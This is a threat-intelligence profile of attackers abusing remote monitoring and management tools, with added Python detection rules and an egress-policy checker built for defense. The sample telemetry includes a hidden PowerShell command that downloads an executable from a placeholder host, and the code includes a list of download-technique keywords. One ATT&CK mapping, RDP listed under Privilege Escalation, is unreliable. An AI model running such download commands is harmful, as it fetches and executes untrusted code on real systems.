2025-03-07 • Proofpoint • Ole Villadsen, Proofpoint Threat Research Team, Selena Larson
# Tool/Technique: Remote Monitoring and Management (RMM) Tooling
## Overview
Remote Monitoring and Management (RMM) tools, traditionally used legitimately by IT professionals for system administration and support, are increasingly being co-opted and misused by threat actors. Attackers leverage these tools to establish persistence, execute arbitrary commands, maintain command and control (C2), and exfiltrate data, often blending malicious activity with legitimate administrative traffic to evade detection.
## Technical Details
- Type: Tool (Legitimate Software Abused by Attackers)
- Platform: Windows, macOS, Linux (platform coverage varies with the specific RMM product)
- Capabilities: Remote desktop access, file transfer, remote command execution, patch management, system monitoring.
- First Seen: Ongoing trend; specific products have been observed in use by threat actors over several years.
## MITRE ATT&CK Mapping
Because RMMs are general-purpose tools, they map across numerous tactics. The most frequent mappings relate to persistence and remote control:
- **TA0003 - Persistence**
  - T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols (RMMs often use standard HTTP/S traffic)
- **TA0005 - Defense Evasion**
  - T1218 - Signed Binary Proxy Execution (if the RMM client is signed)
- **TA0004 - Privilege Escalation**
  - T1021.001 - Remote Services: Remote Desktop Protocol (RMM GUI access)
## Functionality
### Core Capabilities
- **Remote Administration:** Providing interactive access to target systems, mimicking legitimate IT support interaction.
- **Execution Environment:** Utilizing the RMM agent's built-in capabilities to execute scripts (PowerShell, VBScript) or binaries directly on the endpoint.
- **File Transfer:** Moving payloads, tools, or stolen data between the attacker's machine and the compromised host.
### Advanced Features
- **Evasion through Legitimate Traffic:** Network communication often mimics standard administrative protocols, making network-based anomaly detection challenging.
- **Persistence Mechanism:** Once installed, RMM agents run as persistent services, allowing actors to regain access even after user logoffs or simple system reboots.
- **Lateral Movement:** Leveraging RMM access on one machine to deploy the agent or use the existing credentials/context to pivot to other systems within the network.
## Indicators of Compromise
Specific IoCs are highly dependent on the RMM product utilized (e.g., ConnectWise Control, TeamViewer, AnyDesk, ScreenConnect, Atera, etc.).
- File Hashes: [Highly variable, specific to the dropper or modified binary used to install the RMM]
- File Names: [Service executable names matching the vendor (e.g., `agent.exe`, `connectservice.exe`)]
- Registry Keys: [Service installation keys, often under `HKLM\SYSTEM\CurrentControlSet\Services\` pointing to the RMM executable]
- Network Indicators: [C2 communication channels highly dependent on the vendor's standard ports and domains (e.g., traffic destined for `*.hostedrmm.com` or known cloud service providers used by the application)]
- Behavioral Indicators: [Unusual deployment times for RMM agents, remote sessions initiated by non-standard user accounts, or elevated command execution through the RMM channel.]
## Associated Threat Actors
Ransomware groups and financially motivated cybercriminal operations are known to heavily favor RMM tools for initial access or post-exploitation activities.
- Examples often include groups that target MSPs (Managed Service Providers) or utilize initial access brokers who deliver RMM credentials.
## Detection Methods
- Signature-based detection: Limited utility, because the binaries themselves are legitimate; useful only when hashes of specific installers known to have been deployed maliciously are available.
- Behavioral detection: Crucial for detecting the *misuse* of RMMs, such as:
  - Monitoring for RMM processes executing suspicious child processes (e.g., PowerShell downloading further malware).
  - Flagging RMM connections originating from known attacker IP ranges or connecting outside standard business hours.
  - Auditing service installations or modifications related to known RMM software.
- YARA rules: Less effective for detecting the legitimate tooling itself, but useful for identifying wrappers or droppers used to deploy the RMM covertly.
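The three behavioral checks listed above, implemented as an added example that is not code from the Proofpoint report: rules for an RMM agent spawning a script host with a download-style command line, for RMM network connections to a flagged range or outside business hours, and for new services whose ImagePath is an RMM binary. The checks run over constructed, Sysmon-style events embedded in the block. The RMM process names, the flagged range (TEST-NET-3 as a stand-in for a threat-intel feed), the business-hours window and every sample event are assumptions chosen for illustration.

```python
# Added example, not from the Proofpoint report. Process names, the flagged range,
# business hours and all sample events below are assumptions for illustration.
from datetime import datetime
from ipaddress import ip_address, ip_network

# Assumed executable names of RMM agents (extend for the products in your estate).
RMM_PROCESS_NAMES = {"screenconnect.clientservice.exe", "anydesk.exe",
                     "teamviewer.exe", "ateraagent.exe"}
# Assumed threat-intel range; TEST-NET-3 (RFC 5737) is a constructed stand-in.
FLAGGED_EGRESS = [ip_network("203.0.113.0/24")]
BUSINESS_HOURS = (8, 18)                      # 08:00-18:00 local time, assumed
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "certutil", "bitsadmin")


def basename(image):
    """Lower-cased executable name from a path, a quoted ImagePath, or a command line."""
    first = image.strip().strip('"').split('"')[0]        # drop quotes and quoted args
    tail = first.rsplit("\\", 1)[-1]
    return tail.split()[0].lower() if tail.split() else ""


def is_rmm(image):
    return basename(image) in RMM_PROCESS_NAMES


def check_process(ev):
    """Rule 1: an RMM agent spawns a script host whose command line hints at a download."""
    if not is_rmm(ev["parent_image"]):
        return None
    cmd = ev.get("command_line", "").lower()
    if basename(ev["image"]) in SCRIPT_HOSTS and any(h in cmd for h in DOWNLOAD_HINTS):
        return f"RMM child download: {basename(ev['parent_image'])} -> {basename(ev['image'])}"
    return None


def check_network(ev):
    """Rule 2: RMM egress to a flagged range, or any RMM connection outside business hours."""
    if not is_rmm(ev["image"]):
        return None
    dst = ip_address(ev["dest_ip"])
    if any(dst in net for net in FLAGGED_EGRESS):
        return f"RMM egress to flagged range: {basename(ev['image'])} -> {ev['dest_ip']}"
    hour = datetime.fromisoformat(ev["time"]).hour
    if not BUSINESS_HOURS[0] <= hour < BUSINESS_HOURS[1]:
        return f"RMM connection outside business hours: {basename(ev['image'])} at {ev['time']}"
    return None


def check_service(ev):
    """Rule 3: audit every new service whose ImagePath is an RMM binary; call out installs
    from user-writable locations, which sanctioned IT deployments rarely use."""
    path = ev["image_path"]
    if not is_rmm(path):
        return None
    lowered = path.lower()
    user_writable = any(t in lowered for t in ("\\users\\", "\\temp\\", "\\appdata\\"))
    where = "user-writable path" if user_writable else "standard path"
    return f"RMM service installed ({where}): {ev['service_name']} -> {basename(path)}"


CHECKS = {"process_create": check_process,
          "network_connect": check_network,
          "service_install": check_service}


def run_detections(events):
    """Apply the rule for each event's type and return the alert strings."""
    alerts = []
    for ev in events:
        rule = CHECKS.get(ev["type"])
        hit = rule(ev) if rule else None
        if hit:
            alerts.append(hit)
    return alerts


# Constructed sample telemetry (not real data). Events 0, 4, 5 and 6 should alert.
SAMPLE_EVENTS = [
    {"type": "process_create", "time": "2025-03-07T09:15:00",
     "parent_image": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"Invoke-WebRequest http://example.invalid/s2 -OutFile C:\\Users\\Public\\s2.exe\""},
    {"type": "process_create", "time": "2025-03-07T09:16:00", "command_line": "notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe"},
    {"type": "process_create", "time": "2025-03-07T09:17:00", "command_line": "cmd.exe /c whoami",
     "parent_image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"type": "network_connect", "time": "2025-03-07T14:10:00",
     "image": r"C:\Program Files\TeamViewer\TeamViewer.exe", "dest_ip": "198.51.100.7"},
    {"type": "network_connect", "time": "2025-03-08T02:47:00",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "dest_ip": "198.51.100.7"},
    {"type": "network_connect", "time": "2025-03-07T10:00:00",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "dest_ip": "203.0.113.45"},
    {"type": "service_install", "time": "2025-03-07T03:02:00", "service_name": "ScreenConnect Client (abc123)",
     "image_path": r'"C:\Users\bob\AppData\Local\Temp\ScreenConnect.ClientService.exe" "?constructed-args"'},
    {"type": "service_install", "time": "2025-03-07T03:03:00", "service_name": "Schedule",
     "image_path": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]
```

Running `run_detections(SAMPLE_EVENTS)` yields four alerts. Note that the third sample (an RMM agent launching `cmd.exe /c whoami`) is deliberately not flagged by rule 1, because interactive support sessions routinely spawn shells; the page's guidance is to key on the child's behavior (here, download-style arguments) rather than on the shell alone, and a production rule would add further context such as the account and time of day.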
## Mitigation Strategies
- **Principle of Least Privilege:** Ensure RMM credentials used by MSPs or internal IT adhere strictly to the required access levels.
- **Multi-Factor Authentication (MFA):** Enforce MFA on all RMM web portals and administration consoles.
- **Network Segmentation:** Restrict outbound connections from RMM agents to the vendor management infrastructure they actually need, so that a co-opted agent cannot reach arbitrary C2 infrastructure.
- **Application Whitelisting:** Where possible, restrict the paths from which RMM agents may execute, or permit only known-good executables from the sanctioned vendor.
- **Access Auditing:** Rigorously log and alert on administrative sessions, especially interactive remote sessions, looking for anomalous commands run post-connection.
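The network-segmentation item above, as an added example (not code from the report): a default-deny egress model for RMM agents, with a permissive policy beside a segmented one, plus a small lint that flags the any-host and any-port rules the mitigation exists to remove. The vendor hostnames and ports are placeholders, and `Rule`, `is_allowed` and `policy_findings` are names chosen here, not any firewall product's API.

```python
# Added example, not from the Proofpoint report. Vendor hostnames and ports are
# placeholders; a real policy uses the RMM vendor's documented endpoints.
from collections import namedtuple

# host: exact name, "*.suffix" (one or more labels under suffix), or "*"; port: int or "*"
Rule = namedtuple("Rule", "host port")

# Weak: the RMM host may talk to anything, so a co-opted agent can reach arbitrary C2.
WEAK_POLICY = [Rule("*", "*")]

# Segmented: only the vendor's management endpoints (assumed names) on the port they use.
SEGMENTED_POLICY = [
    Rule("*.relay.vendor.example", 443),
    Rule("control.vendor.example", 443),
]


def host_matches(pattern, host):
    """Case-insensitive match; a trailing dot on the host (FQDN form) is ignored."""
    host, pattern = host.lower().rstrip("."), pattern.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        suffix = pattern[1:]                      # ".relay.vendor.example"
        return host.endswith(suffix) and len(host) > len(suffix)
    return host == pattern


def is_allowed(policy, host, port):
    """Default-deny: the connection passes only if some rule matches both host and port."""
    return any(host_matches(r.host, host) and r.port in ("*", port) for r in policy)


def policy_findings(policy):
    """Lint a policy for the broad rules this mitigation is meant to remove."""
    findings = []
    for r in policy:
        if r.host == "*":
            findings.append(f"any-host rule on port {r.port}")
        elif r.port == "*":
            findings.append(f"any-port rule for {r.host}")
    return findings
```

With the segmented policy, `eu1.relay.vendor.example:443` passes while the bare `relay.vendor.example` and any unknown host are denied; the wildcard deliberately matches only names under the suffix, so the allowlist does not grow by accident.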
## Related Tools/Techniques
- MITRE ATT&CK's coverage of abused dual-use legitimate software often encompasses RMMs.
- Other examples include use of legitimate tools like PsExec, PowerShell Empire (legacy/recreations), or scripting engines for similar C2/execution purposes.